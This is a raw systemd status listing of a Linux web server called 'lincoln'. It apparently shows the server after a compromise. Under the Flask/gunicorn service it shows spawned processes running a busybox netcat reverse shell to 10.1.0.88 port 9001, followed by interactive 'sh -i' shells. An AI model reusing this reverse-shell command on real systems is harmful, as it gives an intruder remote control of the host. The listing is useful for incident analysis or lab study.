systemctl --no-pager --full status
● lincoln
    State: running
     Jobs: 0 queued
   Failed: 0 units
    Since: Fri 2024-05-31 09:04:22 CEST; 4 days ago
   CGroup: /
           ├─init.scope
           │ └─1 /sbin/init
           └─system.slice
             ├─systemd-udevd.service
             │ └─189 /lib/systemd/systemd-udevd
             ├─cron.service
             │ └─314 /usr/sbin/cron -f
             ├─nginx.service
             │ ├─9299 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
             │ └─9300 nginx: worker process
             ├─mgmtsshd.service
             │ └─360 /usr/sbin/sshd -D -f /etc/ssh/mgmtsshd_config
             ├─flask.service
             │ ├─ 9226 /var/www/flask/flaskenv/bin/python3 /var/www/flask/flaskenv/bin/gunicorn --workers 3 --bind unix:flask.sock -m 007 wsgi:app
             │ ├─26388 /var/www/flask/flaskenv/bin/python3 /var/www/flask/flaskenv/bin/gunicorn --workers 3 --bind unix:flask.sock -m 007 wsgi:app
             │ ├─26432 /bin/sh -c /bin/sh -c 'export PATH=/bin:/usr/bin/:/var/www/flask/flaskenv/bin ; busybox nc 10.1.0.88 9001 -e "script"'
             │ ├─26433 /bin/sh -c export PATH=/bin:/usr/bin/:/var/www/flask/flaskenv/bin ; busybox nc 10.1.0.88 9001 -e "script"
             │ ├─26434 script
             │ ├─26435 sh -i
             │ ├─26438 /var/www/flask/flaskenv/bin/python3 /var/www/flask/flaskenv/bin/gunicorn --workers 3 --bind unix:flask.sock -m 007 wsgi:app
             │ ├─26478 /bin/sh -c /bin/sh -c 'export PATH=/bin:/usr/bin/:/var/www/flask/flaskenv/bin ; busybox nc 10.1.0.88 9001 -e "script"'
             │ ├─26479 /bin/sh -c export PATH=/bin:/usr/bin/:/var/www/flask/flaskenv/bin ; busybox nc 10.1.0.88 9001 -e "script"
             │ ├─26480 script
             │ ├─26481 sh -i
             │ ├─26483 /var/www/flask/flaskenv/bin/python3 /var/www/flask/flaskenv/bin/gunicorn --workers 3 --bind unix:flask.sock -m 007 wsgi:app
             │ └─26496 systemctl --no-pager --full status
             ├─ifup@ens18.service
             │ └─10161 /sbin/dhclient -4 -v -i -pf /run/dhclient.ens18.pid -lf /var/lib/dhcp/dhclient.ens18.leases -I -df /var/lib/dhcp/dhclient6.ens18.leases ens18
             ├─systemd-journald.service
             │ └─174 /lib/systemd/systemd-journald
             ├─rsyslog.service
             │ └─311 /usr/sbin/rsyslogd -n -iNONE
             ├─qemu-guest-agent.service
             │ └─309 /usr/sbin/qemu-ga
             ├─dbus.service
             │ └─315 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
             ├─systemd-timesyncd.service
             │ └─288 /lib/systemd/systemd-timesyncd
             ├─system-getty.slice
             │ └─getty@tty1.service
             │   └─345 /sbin/agetty -o -p -- \u --noclear tty1 linux
             └─systemd-logind.service
               └─313 /lib/systemd/systemd-logind
